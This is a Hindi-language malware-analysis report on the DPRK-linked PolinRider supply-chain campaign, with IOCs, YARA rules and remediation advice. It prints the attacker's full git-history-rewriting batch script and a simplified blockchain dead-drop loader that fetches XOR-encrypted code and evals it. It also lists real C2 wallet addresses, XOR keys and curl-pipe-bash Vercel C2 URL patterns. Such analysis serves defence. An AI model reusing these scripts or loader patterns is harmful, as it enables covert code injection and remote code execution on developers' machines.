
DPRK-लिंक्ड PolinRider आपूर्ति-श्रृंखला हमले पर तकनीकी डोजियर, जिसमें अस्पष्ट JS पेलोड इंजेक्शन, git इतिहास हेरफेर, C2 बुनियादी ढांचा, और 1,951 समझौता किए गए रिपॉजिटरी के लिए सुधार मार्गदर्शन का दस्तावेजीकरण किया गया है।

OpenSourceMalware टीम ने एक बड़े पैमाने पर खतरे के अभियान का पता लगाया है जो GitHub उपयोगकर्ताओं और संगठनों के रिपॉजिटरी में मैलवेयर इम्प्लांट कर रहा है। खतरा अभिनेता, PolinRider, ने सैकड़ों अद्वितीय मालिकों से संबंधित सैकड़ों सार्वजनिक GitHub रिपॉजिटरी में दुर्भावनापूर्ण अस्पष्ट JavaScript पेलोड इम्प्लांट किए हैं। इस अभियान से संबंधित सभी खतरे की रिपोर्ट देखने के लिए #polinrider का उपयोग करें, और समझौता किए गए रिपॉजिटरी की सूची के लिए इस ब्लॉग के अंत पर जाएं, जिसमें वे रिपॉजिटरी शामिल हैं जिन्हें हम तत्काल कार्रवाई के लिए प्राथमिकता देने की सलाह देते हैं। ध्यान रखें कि टैग वर्तमान डेटा प्राप्त करने का सबसे अच्छा तरीका है।
JavaScript पेलोड वास्तविक प्रोजेक्ट कॉन्फिग फ़ाइलों के अंत में जोड़ा जाता है — चुपचाप, फ़ाइल की वैध सामग्री के बाद — जिससे आकस्मिक कोड समीक्षा के दौरान इसे अनदेखा करना आसान हो जाता है। प्राथमिक संक्रमण वेक्टर एक समझौता किया गया npm पैकेज प्रतीत होता है जो इंस्टॉल या बिल्ड के दौरान निष्पादित होता है और प्रोजेक्ट रूट में कॉन्फिग फ़ाइलों में खुद को इंजेक्ट करता है। इससे भी बदतर, इस खतरा अभिनेता ने उसी तकनीक का उपयोग करके दुर्भावनापूर्ण NPM पैकेज भी बनाए हैं।
यह हमला बेहद सफल रहा है, एक समझौता किए गए ओपन सोर्स प्रोजेक्ट, Neutralinojs ने मैलवेयर को अपने सैकड़ों उपयोगकर्ताओं और योगदानकर्ताओं तक फैला दिया। Neutralinojs 8400 स्टार, 495 फोर्क और दर्जनों सक्रिय योगदानकर्ताओं वाला एक बहुत लोकप्रिय प्रोजेक्ट है। इस प्रकार के हमले की यही शक्ति है, क्योंकि खतरा केवल प्रारंभिक GitHub रिपॉजिटरी तक सीमित नहीं है, बल्कि उन सभी अन्य प्रोजेक्टों तक फैलता है जो उस ओपन सोर्स का उपयोग करते हैं।
OpenSourceMalware टीम ने इस अभियान को DPRK से जोड़ा है, और खतरा अभिनेता PolinRider, "Contagious Interview" और "TasksJacker" अभियानों से संबंधों के साथ एक ज्ञात Lazarus समूह योगदानकर्ता है।
यह अभियान पहले प्रकाशन के बाद से नाटकीय रूप से बढ़ा है। 2026-04-11 तक, OSM टीम ने 1,047 अद्वितीय मालिकों से संबंधित 1,951 सार्वजनिक GitHub रिपॉजिटरी की पुष्टि की है जो समझौता किए गए हैं। यह मूल प्रकाशन तिथि (8 मार्च: 675 रिपॉजिटरी / 352 मालिक) के बाद से पांच हफ्तों में 2.9× वृद्धि है।

2026-04-10 से शुरू और 2026-04-11 तक जारी एक अनुवर्ती शिकार में, OSM टीम ने कई प्रमुख निष्कर्ष निकाले:
यह अभियान 5 हफ्तों में दोगुने से अधिक हो गया है। GitHub Code Search और Sourcegraph के माध्यम से क्रॉस-इंजन गणना (API की 1000-परिणाम सीमा से परे शोधन के साथ — नीचे कार्यप्रणाली देखें) ने पहले दिन हमारे v3 मास्टर में 1,556 अद्वितीय समझौता किए गए रिपॉजिटरी सामने लाए। दूसरे दिन एक राउंड-2 शिकार में npm-पैकेज-नाम पिवट्स, VS Code tasks.json / क्लाउड-प्रदाता पिवट्स, और नए खोजे गए default-configuration.vercel.app C2 उपडोमेन के माध्यम से और 215 नए रिपॉजिटरी जोड़े गए। मौजूदा affected_repos.csv कॉर्पस के खिलाफ डिडुपिंग के बाद, सही ज्ञात दायरा अब 1,951 अद्वितीय पीड़ित रिपॉजिटरी / 1,047 अद्वितीय मालिक है।
एक नया वेरिएंट देखा गया है। PolinRider ने आर्किटेक्चर को संरक्षित करते हुए अपने ऑबफस्केटर के सभी अद्वितीय फिंगरप्रिंट को घुमाया है। नया वेरिएंट सिग्नेचर मार्कर Cot%3t=shtP (पहले rmcej%otb% था), शफल सीड 1111436 (पहले 2857687), द्वितीयक सीड 3896884 (पहले 2667686), और डिकोडर फंक्शन नाम MDy (पहले _$_1e42) का उपयोग करता है। यह रोटेशन प्रकाशित YARA नियम के लिए एक चोरी प्रतिक्रिया प्रतीत होता है। दोनों वेरिएंट वर्तमान में जंगली में सक्रिय हैं। नीचे देखें।
पूर्ण v3 + राउंड 2 शिकार रिपोर्ट और मास्टर TSV reports/ में हैं।
खतरा अभिनेता चुराए गए GitHub क्रेडेंशियल का उपयोग नहीं कर रहा है। इसके बजाय, पीड़ितों को एक दुर्भावनापूर्ण VS Code एक्सटेंशन या NPM पैकेज के माध्यम से समझौता किया गया है। हम अभी तक नहीं जानते कि वह प्रारंभिक वेक्टर क्या है, लेकिन हम फोरेंसिक साक्ष्य से जानते हैं कि यह क्या करता है।
सबसे पहले होता है कि मैलवेयर स्थानीय कंप्यूटर पर एक खोज फ़ंक्शन निष्पादित करता है जो कुछ फ़ाइलों की तलाश करता है जैसे:
यदि इनमें से कोई फ़ाइल मिलती है, तो यह उस फ़ाइल के अंत में भारी रूप से अस्पष्ट दुर्भावनापूर्ण JavaScript कोड जोड़ देगा। इसके बाद, मैलवेयर temp_auto_push.bat नामक एक Windows बैच फ़ाइल स्थापित करता है। हम जानते हैं कि यह फ़ाइल मौजूद है और यह क्या करती है क्योंकि खतरा अभिनेताओं ने इसे सैकड़ों समझौता किए गए सर्वरों पर छोड़ दिया है जो शोधकर्ताओं को खोजने के लिए एक फिंगरप्रिंट देता है। यहाँ बैच फ़ाइल पूरी तरह से है:``` @echo off for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%Y-%%m-%%d --format=%%cd"') do set LAST_COMMIT_DATE=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --date=format-local:%%H:%%M:%%S --format=%%cd"') do set LAST_COMMIT_TIME=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%s"') do set LAST_COMMIT_TEXT=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%an"') do set USER_NAME=%%A for /f "delims=" %%A in ('cmd /c "git log -1 --format=%%ae"') do set USER_EMAIL=%%A for /f "delims=" %%A in ('git rev-parse --abbrev-ref HEAD') do set CURRENT_BRANCH=%%A echo %LAST_COMMIT_DATE% %LAST_COMMIT_TIME% echo %LAST_COMMIT_TEXT% echo %USER_NAME% (%USER_EMAIL%) echo Branch: %CURRENT_BRANCH% set CURRENT_DATE=%date% set CURRENT_TIME=%time% date %LAST_COMMIT_DATE% time %LAST_COMMIT_TIME% echo Date temporarily changed to %LAST_COMMIT_DATE% %LAST_COMMIT_TIME% git config --local user.name %USER_NAME% git config --local user.email %USER_EMAIL% git add . git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify date %CURRENT_DATE% time %CURRENT_TIME% echo Date restored to %CURRENT_DATE% %CURRENT_TIME% and complete amend last commit! git push -uf origin %CURRENT_BRANCH% --no-verify @echo on
### बैच फ़ाइल विश्लेषण
यह बैच फ़ाइल **सबसे हाल के git कमिट को उसके मूल टाइमस्टैम्प को बनाए रखते हुए पुनर्लिखित करती है** — प्रभावी रूप से एक संशोधित कमिट को ऐसा दिखाती है जैसे उसे कभी छुआ ही न गया हो।
#### चरण 1: अंतिम कमिट मेटाडेटा निकालें
यह पाँच बार `git log -1` चलाकर अंतिम कमिट का विवरण पर्यावरण चरों में खींचता है:
| Variable | Value captured |
|---|---|
| `LAST_COMMIT_DATE` | अंतिम कमिट की तिथि (YYYY-MM-DD) |
| `LAST_COMMIT_TIME` | अंतिम कमिट का समय (HH:MM:SS) |
| `LAST_COMMIT_TEXT` | कमिट संदेश |
| `USER_NAME` | लेखक का नाम |
| `USER_EMAIL` | लेखक का ईमेल |
| `CURRENT_BRANCH` | वर्तमान शाखा का नाम |
#### चरण 2: निकाली गई जानकारी प्रदर्शित करें
उन मानों को कंसोल पर प्रतिध्वनित (echo) करता है ताकि आगे बढ़ने से पहले आप देख सकें क्या कैप्चर किया गया।
#### चरण 3: टाइमस्टैम्प ट्रिक (मुख्य हेरफेर)
1. वर्तमान *सिस्टम* तिथि और समय को चरों में सहेजता है
2. **Windows सिस्टम घड़ी को बदलता है** ताकि वह अंतिम कमिट की तिथि और समय से मेल खाए
3. स्थानीय git `user.name` और `user.email` को मूल कमिट के लेखक से मेल खाने के लिए सेट करता है
#### चरण 4: कमिट में संशोधन करें```bat
git add .
git commit --amend -m "%LAST_COMMIT_TEXT%" --no-verify
चूँकि सिस्टम क्लॉक को पीछे कर दिया गया था, git संशोधित कमिट को मूल टाइमस्टैम्प के साथ रिकॉर्ड करता है, जिससे यह इतिहास में अपरिवर्तित दिखाई देता है। --no-verify किसी भी प्री-कमिट हुक को बायपास करता है।
-uf और --no-verify के साथ रिमोट ब्रांच पर फोर्स-पुश करता हैयह स्क्रिप्ट आपको अंतिम कमिट में चुपचाप बदलाव करने (फ़ाइलें जोड़ने या बदलने) की अनुमति देती है, जबकि पुनर्लिखित कमिट को पहले जैसा ही लेखक, टाइमस्टैम्प और संदेश दिखाती है। git इतिहास को देखने वाले किसी भी पर्यवेक्षक के लिए, ऐसा लगता है जैसे कमिट को कभी संशोधित नहीं किया गया था।
-uf) रिमोट हिस्ट्री को ओवरराइट करेगा – ब्रांच पर किसी और के लिए विनाशकारी--no-verify फ़्लैग जानबूझकर किसी भी CI/CD हुक या लिंट चेक को बायपास करते हैंहम मानते हैं कि मैलवेयर में लिनक्स और मैकओएस जैसे अन्य ऑपरेटिंग सिस्टम के लिए git इतिहास को फिर से लिखने के समान कार्य हैं। वास्तव में, हमने इस बात के सबूत देखे हैं कि यह अन्य OS पर हो रहा है, लेकिन खतरे के अभिनेताओं ने स्रोत कोड में उन अन्य प्लेटफार्मों पर काम करने वाले उपकरण नहीं छोड़े हैं जैसे उन्होंने विंडोज के लिए छोड़े हैं।
प्रभावित रेपो मालिकों के लिए:
postcss.config.*, tailwind.config.*, eslint.config.*, next.config.*, vite.config.*, webpack.config.js, gridsome.config.js, vue.config.js, आदि) का ऑडिट करें कि export default या module.exports के बाद दिखाई देने वाली सामग्री के लिए। गैर-डिफ़ॉल्ट शाखाओं और नेस्टेड मोनोरेपो पथों (apps/*/, frontend/, client/, web/, आदि) की भी जाँच करें — कई पीड़ित केवल गहरे पथों में संक्रमित होते हैं।सुरक्षा उपकरण / रजिस्ट्रियों के लिए:
polinrider_payload YARA नियम (नीचे) जोड़ें — rmcej%otb% और Cot%3t=shtP दोनों वेरिएंट को कवर करता है।filename:temp_auto_push.bat और LAST_COMMIT_DATE LAST_COMMIT_TIME extension:bat जोड़ें।हमारी टीम ने एक bash स्क्रिप्ट लिखी है जो समझौते के लिए आपके स्थानीय सिस्टम की जाँच करेगी। इस ब्लॉग पोस्ट के अंत में आप और अधिक जानकारी प्राप्त कर सकते हैं, या आप स्क्रिप्ट यहाँ देख सकते हैं यहाँ
10 अप्रैल के अपडेट ने फ़ाइल-प्रकार सूची का महत्वपूर्ण रूप से विस्तार किया। मैलवेयर मूल रूप से प्रलेखित की तुलना में JS-परिवार की फ़ाइलों के एक व्यापक सेट को लक्षित करता है, और इसे .woff2 फ़ॉन्ट फ़ाइलों जैसी बाइनरी एसेट्स के अंदर भी देखा गया है। नीचे दी गई गणनाएँ 1,736 अद्वितीय रेपो के 2026-04-10 कॉर्पस को दर्शाती हैं।
postcss.config.mjs का प्रभुत्व (दोनों डेटा बिंदुओं में ~62% रेपो) प्राथमिक संक्रमण वेक्टर के रूप में PostCSS / Tailwind पारिस्थितिकी तंत्र की ओर इशारा करता रहता है। नव देखी गई प्रविष्टियाँ — vite.config.*, webpack.config.js, gridsome.config.js, vue.config.js, truffle.js, और बाइनरी .woff2 फ़ाइलें — दर्शाती हैं कि मैलवेयर ने अपनी फ़ाइल-लक्ष्यीकरण अनुमानों का विस्तार किया है या खतरे के अभिनेता विभिन्न बिल्ड टूलिंग का उपयोग करने वाले पीड़ितों तक पहुँचने के लिए कई npm-पैकेज वाहनों का उपयोग कर रहे हैं।
प्रसार-स्क्रिप्ट आर्टिफैक्ट temp_auto_push.bat 101 पीड़ित रेपो में पीछे छोड़ दिया गया है, उन मामलों में भी जहां JS पेलोड को बाद में मालिक द्वारा साफ कर दिया गया है। यह फ़ाइल पिछले समझौते के उच्चतम-विश्वास वाले संकेतकों में से एक है।

खतरे के अभिनेता ने कई दुर्भावनापूर्ण NPM पैकेज प्रकाशित किए हैं, जो सभी Tailwind / PostCSS से सटे उपयोगिताओं का रूप धारण करते हैं। 2026-04-11 तक, allavin और blackedward npm खातों को npm से हटा दिया गया है और उनके पैकेज मिटा दिए गए हैं, लेकिन मौजूदा पीड़ित रेपो में अभी भी निर्भरता संदर्भ हैं और (कई मामलों में) अभी भी उनकी कॉन्फ़िग फ़ाइलों में पोस्ट-इंस्टॉल-इंजेक्टेड मैलवेयर है।
11 अप्रैल की खोज ने पुष्टि की कि tailwindcss-style-animate ^1.1.6 ShoeVista फ़ेक-इंटरव्यू टेम्पलेट की प्राथमिक दुर्भावनापूर्ण निर्भरता है — 46 npm-पैकेज-पिवट हिट्स में से 34 उस टेम्पलेट के साथ उस सटीक निर्भरता के डेवलपर रीअपलोड हैं। सूची में अन्य पैकेज सहयोगी अभियानों द्वारा उपयोग किए जाते हैं (जैसे devhire-frontend क्लस्टर में tailwind-autoanimation और reactapp-6)।
npm निर्भरता ट्री के माध्यम से पिवट करने के इच्छुक अन्वेषकों को ध्यान देना चाहिए कि यह पिवट अब tailwind-mainanimation के लिए व्यवहार्य नहीं है — npm ने लाइव दुर्भावनापूर्ण रिलीज़ को हटा दिया है। इसके बजाय GitHub Code Search क्वेरीज़ "<package_name>" filename:package.json के माध्यम से पिवट करें, जो अभी भी पीड़ित रेपो में भूत संदर्भ लौटाती हैं।

tailwind-autoanimation पैकेज एंट्रीपॉइंट फ़ाइल src/index.js के अंत में दुर्भावनापूर्ण JavaScript पेलोड को जोड़ने की समान सटीक तकनीक का उपयोग करता है:

PolinRider एक बहु-चरणीय पेलोड प्रदान करता है, जो DPRK Beavertail मैलवेयर के एक नए संस्करण में परिणत होता है। प्रारंभिक पेलोड एक बड़े पैमाने पर समझौता करने वाला बैकडोर/इन्फोस्टीलर है जो वैध डेवलपर्स के रिपॉजिटरी में एक अस्पष्ट JavaScript पेलोड इंजेक्ट करता है। पेलोड को सामान्य कॉन्फ़िग फ़ाइलों (postcss.config.mjs, eslint.config.mjs, tailwind.config.js, आदि) में व्हाइटस्पेस पैडिंग के बाद जोड़ा जाता है ताकि बिल्ड टूल द्वारा मॉड्यूल आयात करने पर यह स्वचालित रूप से निष्पादित हो। यह एक बहु-स्तरीय स्ट्रिंग शफलिंग डीओबफस्केशन रूटीन का उपयोग करता है, अंततः रनटाइम पर अंतिम पेलोड का निर्माण और eval करता है।
OSM टीम ने अब तक घुमाए गए अद्वितीय फिंगरप्रिंट के साथ इस ओबफसकेटर के दो सक्रिय वेरिएंट देखे हैं:
("rmcej%otb%",2857687), डीकोडर फ़ंक्शन _$_1e42, द्वितीयक बीज 2667686, इंजेक्शन मार्कर global['!'].Cot%3t=shtP, शफल बीज 1111436, डीकोडर फ़ंक्शन MDy, द्वितीयक बीज 3896884, इंजेक्शन मार्कर global['_V']='8-XXX'। समान आर्किटेक्चर, सभी अद्वितीय स्थिरांक घुमाए गए — लगभग निश्चित रूप से प्रकाशित rmcej_otb_payload YARA नियम के जवाब में एक चोरी रणनीति।दोनों वेरिएंट समान XOR कुंजियों के साथ समान ब्लॉकचेन डेड-ड्रॉप C2 बुनियादी ढाँचे (TRON / Aptos / BSC) का उपयोग करते हैं, और दोनों वर्तमान में जंगली में सक्रिय हैं।
यह अंतिम पेलोड एक परिष्कृत ब्लॉकचेन-आधारित डेड ड्रॉप रिज़ॉल्वर है जो कमांड एंड कंट्रोल (C2) बुनियादी ढाँचे के रूप में अपरिवर्तनीय ब्लॉकचेन लेनदेन का उपयोग करता है। मैलवेयर ब्लॉकचेन खातों (TRON, Aptos, और BSC) से एन्क्रिप्टेड JavaScript पेलोड लाता है, XOR एन्क्रिप्शन का उपयोग करके उन्हें डिक्रिप्ट करता है, और eval() के माध्यम से निष्पादित करता है। यह तकनीक C2 बुनियादी ढाँचे को वस्तुतः हटाने योग्य नहीं बनाती है क्योंकि ब्लॉकचेन डेटा अपरिवर्तनीय है।
ब्लॉकचेन-आधारित C2 संचार
पेलोड डिक्रिप्शन
रिमोट कोड निष्पादन
eval() के माध्यम से निष्पादित करता हैएंटी-एनालिसिस विशेषताएँ
OSM टीम ने हमारे ब्लॉग में हाल के Neutralinojs समझौते पर इस मैलवेयर के लिए पूर्ण हमला श्रृंखला का वर्णन किया।
मैलवेयर ओबफस्केशन की चार परतों का उपयोग करता है:
परत 1: बीज 2857687 के साथ वर्ण स्वैप एल्गोरिथ्म
['r', 'object', 'm'] (require, typeof चेक, module)परत 2: बीज 2667686 के साथ वर्ण स्वैप
परत 3: कस्टम प्रतिस्थापन सिफर
.c, .a, आदि जैसे प्लेसहोल्डर को वास्तविक वर्णों से बदलता है\, `, स्पेस, न्यूलाइन, *, ', और अधिकपरत 4: अंतिम पेलोड के लिए XOR एन्क्रिप्शन
Cot%3t=shtPअप्रैल 2026 में OSM टीम ने PolinRider ओबफसकेटर के दूसरे सक्रिय वेरिएंट की पहचान की। आर्किटेक्चर मूल के समान है — वही 4-परत शफल-सिफर, वही ब्लॉकचेन डेड-ड्रॉप C2, वही बहु-चरणीय Beavertail दूसरा चरण — लेकिन हर अद्वितीय फिंगरप्रिंट स्ट्रिंग को घुमाया गया है, लगभग निश्चित रूप से प्रकाशित rmcej_otb_payload YARA नियम के जवाब में।
नया वेरिएंट एक अतिरिक्त इंजेक्शन मार्कर लाइन का उपयोग करता है: global['_V']='8-XXX' (जहाँ 8-XXX प्रति-इंजेक्शन संस्करण टैग है, जैसे 8-st1, 8-st2, …, 8-st59, साथ ही एक समानांतर संख्यात्मक बैच जैसे 8-413, 8-683, 8-778, 8-974)। अनुक्रमिक '8-stN' टैग OSM टीम के लिए सबसे मजबूत सबूत हैं कि खतरे के अभिनेता का टूलिंग प्रति पीड़ित को एक संख्यात्मक आईडी प्रदान करता है और इस वेरिएंट के कम से कम 59 अनुक्रमिक इंजेक्शन मौजूद हैं (कुछ अभी तक सार्वजनिक कोड खोज द्वारा अनुक्रमित नहीं किए गए हैं)।
कम से कम एक रिपॉजिटरी — HassanHabibTahir/testclient — में विभिन्न फ़ाइलों में दोनों वेरिएंट के मार्कर हैं (postcss.config.mjs में rmcej%otb% और दूसरी फ़ाइल में global['_V']), यह दर्शाता है कि खतरे के अभिनेता का टूलिंग घुमाए गए ओबफसकेटर के साथ पहले से समझौता किए गए होस्ट के विरुद्ध पुन: चल रहा है। रक्षकों को यह नहीं मानना चाहिए कि एक बार साफ किया गया रेपो साफ रहेगा।
npm-पैकेज और .vscode/tasks.json वितरण वैक्टर के अलावा, PolinRider खतरे के अभिनेता ने कम से कम दो फर्जी टेक-होम टेस्ट प्रोजेक्ट लिखे हैं जो फर्जी नौकरी-साक्षात्कार लालच (क्लासिक Contagious Interview प्लेबुक) के माध्यम से उम्मीदवारों को वितरित किए जाते हैं। ये प्रोजेक्ट टेम्पलेट दुर्भावनापूर्ण निर्भरता या tasks.json पेलोड के साथ पहले से लोड होते हैं ताकि प्रोजेक्ट को क्लोन और चलाने मात्र से संक्रमण शुरू हो जाए।
ShoeVista (यह भी देखा गया: shoevista, shoe-vista, Test-west-shoe, Test-002, product-catalog, mern-app, विभिन्न उम्मीदवार-नामित फ़ोर्क्स)client/ में React फ्रंटएंड, server/ में Node/Express बैकएंड (विशिष्ट MERN टेक-होम)client/package.json में दुर्भावनापूर्ण npm निर्भरता "tailwindcss-style-animate": "^1.1.6"name फ़ील्ड: "client" (सामान्य — ShoeVista ब्रांडिंग README / फ़ेक-कंपनी लैंडिंग पेज में है)"projectInfo": { "name": "StakingGame", "description": "Advanced VSCode automation for multi-environment blockchain deployment.", "uuid": "e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9" } — UUID सभी पीड़ितों में स्थिर है और इस टेम्पलेट का सबसे मजबूत संकेतक है.vscode/tasks.json जिसमें runOn: folderOpen curl | bash को default-configuration.vercel.app और अन्य नव खोजे गए Vercel C2 सबडोमेन के विरुद्ध निष्पादित करता हैDevba/lmng-top-, wyrustaaruz/cal-eco-platformपूर्व-शस्त्रीकृत टेम्पलेट परियोजनाओं के अस्तित्व का अर्थ है:
test-*, *-test, *-interview, *-assessment, *-task) शामिल करने चाहिए।### कोड संरचना```javascript
// Simplified structure (actual code is heavily obfuscated)
async function fetchPayloadFromTron(address) {
// Queries TRON API for account transactions
const response = await https.get(
`https://api.trongrid.io/v1/accounts/${address}/transactions?only_confirmed=true&only_from=true&limit=1`
);
// Extracts encrypted data from transaction
return response.data[0].raw_data.data;
}
async function fetchPayloadFromAptos(txHash) {
// Queries Aptos API for transaction details
const response = await https.get(
`https://fullnode.mainnet.aptoslabs.com/v1/accounts/${txHash}/transactions?limit=1`
);
// Extracts payload from transaction arguments
return response[0].payload.arguments[0];
}
function xorDecrypt(encryptedData, key) {
// XOR decryption with repeating key
let result = '';
for (let i = 0; i < encryptedData.length; i++) {
const keyChar = key.charCodeAt(i % key.length);
result += String.fromCharCode(encryptedData.charCodeAt(i) ^ keyChar);
}
return result;
}
// Main execution
const encryptedPayload = await fetchPayloadFromTron("TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP");
const decryptedCode = xorDecrypt(encryptedPayload, "2[gWfGj;<:-93Z^C");
eval(decryptedCode); // EXECUTES ARBITRARY CODE
// Persistence via detached child process
require('child_process').spawn('node', ['-e', `global['_V']='...'${decryptedCode}`], {
detached: true,
stdio: 'ignore',
windowsHide: true
});
.vscode/tasks.json में runOn: folderOpen के साथ curl | bash पेलोड में उपयोग किया गया। सभी URL पैटर्न https://<sub>.vercel.app/settings/(mac|linux|win)?flag=<N> का अनुसरण करते हैं। ये हमलावर-नियंत्रित बूटस्ट्रैप सर्वर हैं जो VS Code पीड़ितों को PolinRider JS लोडर प्रदान करते हैं।
सभी पाँच vscode-* / default-configuration डोमेन 10–11 अप्रैल की खोज में पाए गए और अब OSM शिकार क्वेरी सेट का हिस्सा हैं। और अधिक सहोदर सबडोमेन की उम्मीद करें क्योंकि Vercel डोमेन खतरे वाले अभिनेता के लिए सस्ते/डिस्पोजेबल होते हैं।
TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP (प्राथमिक)TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG (द्वितीयक)API एंडपॉइंट: https://api.trongrid.io/v1/accounts/
0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e (प्राथमिक)0x3f0e5781d0855fb460661ac63257376db1941b2bb522499e4757ecb3ebd5dce3 (द्वितीयक)API एंडपॉइंट: https://fullnode.mainnet.aptoslabs.com/v1/accounts/
bsc-dataseed.binance.orgbsc-rpc.publicnode.comविधि: eth_getTransactionByHash
2[gWfGj;<:-93Z^Cm6:tTh^D)cBz?NM]e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9 — दुर्भावनापूर्ण .vscode/tasks.json के projectInfo.uuid फ़ील्ड में StakingGame नकली-साक्षात्कार टेम्पलेट के लिए दिखाई देता है। अत्यधिक विशिष्ट; परीक्षण में 0 झूठी सकारात्मकता।मूल rmcej_otb_payload नियम (अभी भी मूल वेरिएंट के लिए मान्य) को एक बहु-वेरिएंट नियम द्वारा प्रतिस्थापित किया गया है जो मूल rmcej%otb% स्ट्रेन और घुमाए गए Cot%3t=shtP स्ट्रेन दोनों को पकड़ता है। इसका उपयोग स्थैतिक विश्लेषण पाइपलाइनों में करें।```yara
rule polinrider_payload {
meta:
description = "Detects PolinRider shuffle-cipher JS payloads — both rmcej%otb% (v1) and Cot%3t=shtP (v2) variants"
author = "OpenSourceMalware.com"
date = "2026-04-10"
severity = "high"
strings:
// Original variant (rmcej%otb%)
$marker_v1 = "rmcej%otb%"
$seed1_v1 = "2857687"
$seed2_v1 = "2667686"
$varname_v1 = "_$_1e42"
$global_bang = "global['!']"
// New variant (Cot%3t=shtP)
$marker_v2 = "Cot%3t=shtP"
$seed1_v2 = "1111436"
$seed2_v2 = "3896884"
$varname_v2 = "MDy"
$global_V = "global['_V']"
// Common across variants
$global_r = "global['r'] = require"
$global_m = "global['m'] = module"
condition:
any of ($marker_*) or
($global_bang and ($seed1_v1 or $varname_v1)) or
($global_V and ($seed1_v2 or $varname_v2)) or
($global_r and $global_m and (any of ($seed1_*)))
}
### YARA Rule (पुरातन) — केवल मूल संस्करण```yara
rule rmcej_otb_payload {
meta:
description = "Detects rmcej%otb% shuffle-cipher JS payload injected into config files (original variant only)"
author = "OpenSourceMalware.com"
date = "2026-03-07"
severity = "high"
strings:
$marker = "rmcej%otb%"
$global = "global['!']"
$seed1 = "2857687"
$seed2 = "2667686"
$varname = "_$_1e42"
condition:
$marker or ($global and $seed1) or ($varname and $seed2)
}
डेटा gh search code के माध्यम से GitHub Code Search API का उपयोग करके एकत्र किया गया था, प्रति संक्रमित फ़ाइलनाम एक क्वेरी चलाकर 1,000-परिणाम-प्रति-क्वेरी सीमा से बचने के लिए। परिणाम रिपॉजिटरी पूर्ण नाम द्वारा डिडुप्लिकेट किए गए थे।
10 अप्रैल की खोज ने पांच ऑर्थोगोनल पिवट को जोड़कर और एक्सटेंशन/साइज़/फ़ोर्क रणनीति लागू करके डेटा संग्रह का विस्तार किया ताकि सबसे शक्तिशाली पिवट पर GitHub Code Search की 1,000-परिणाम-प्रति-क्वेरी सीमा को पार किया जा सके।
_$_1e42 डिकोडर फ़ंक्शन-नाम क्वेरी ने total_count: 968 की सूचना दी और 1,000 वापस आइटम पर सीमित हो गई, लेकिन GitHub वेब UI ने 1,400+ मिलान दिखाए। ऑर्थोगोनल उप-क्वेरी में परिशोधन करके जो प्रत्येक 1,000 परिणामों से नीचे रहें, और फिर संघ लेने से सीमा टूट गई:
इस अभ्यास से तीन महत्वपूर्ण निष्कर्ष:
fork:false)। fork:true जोड़ने से 157 फ़ोर्क रिपॉजिटरी का पता चला जिनमें मार्कर था जो मूल क्वेरी से पूरी तरह अदृश्य थे।size:5000..10000 रेंज को 1KB स्लाइस में उप-बकेट करने पर 986 परिणाम मिले, जबकि बकेट की रिपोर्टेड 968 थी — 1000 से कम रिपोर्टेड कुल के भीतर भी, सीमा प्रविष्टियों को छिपा सकती है। सही दृष्टिकोण पुनरावर्ती बकेटिंग है जब तक प्रत्येक बकेट सीमा से काफी नीचे न हो।extension: विभाजन language: विभाजनों की तुलना में अधिक कुल परिणाम देते हैं क्योंकि GitHub की भाषा पहचान कभी-कभी JavaScript बकेट से .mjs और .cjs को बाहर कर देती है।अप्रैल 10–11 की खोज डेटा को मौजूदा affected_repos.csv के साथ जोड़ने से वर्तमान में ज्ञात वास्तविक कोष प्राप्त होता है:
खोज के दोनों राउंड में लिए गए 44 यादृच्छिक नमूनों में, 0 गलत सकारात्मक देखे गए। प्रत्येक नमूना रिपॉजिटरी में कम से कम एक PolinRider अपरिवर्तनीय (rmcej%otb%, Cot%3t=shtP, _$_1e42, MDy, global['!'], global['_V'], प्रसार .bat के अंदर LAST_COMMIT_DATE, package.json में एक ज्ञात दुर्भावनापूर्ण npm पैकेज, या एक ज्ञात C2 सबडोमेन पर curl \| bash के साथ एक .vscode/tasks.json) शामिल था, अनुक्रमित पिवट पथ पर फ़ाइल में।
राउंड 2 ने विशेष रूप से सबमिशन वर्गीकरण में दो नए प्रकार वर्गीकरण पेश किए:
malicious_npm: रिपॉजिटरी में package.json में 7 ज्ञात दुर्भावनापूर्ण npm पैकेजों में से एक है (45 सबमिशन — लगभग सभी ShoeVista टेम्पलेट पुनः अपलोड)।tasksjacker: रिपॉजिटरी में एक .vscode/tasks.json है जिसमें runOn: folderOpen कार्य है जो Vercel/Render/Railway C2 सबडोमेन के खिलाफ curl \| bash या wget \| sh निष्पादित करता है (27 सबमिशन — इसमें StakingGame टेम्पलेट क्लस्टर शामिल है)।सभी समझौता किए गए रिपॉजिटरी OpenSourceMalware टैग #polinrider के माध्यम से पाए जा सकते हैं।
पूर्ण CSV प्रभाव के आधार पर ट्रायेज के लिए क्रमबद्ध हैं।
प्राथमिकता लक्ष्य:
sparktechagency(130 अनुयायी, 12 रिपॉजिटरी) औरFSDTeam-SAA(21 अनुयायी, 12 रिपॉजिटरी) सबसे अधिक मात्रा वाले संगठन हैं। व्यक्तियों में,coderkhalide(349 अनुयायी) की सबसे व्यापक प्रत्यक्ष पहुँच है।
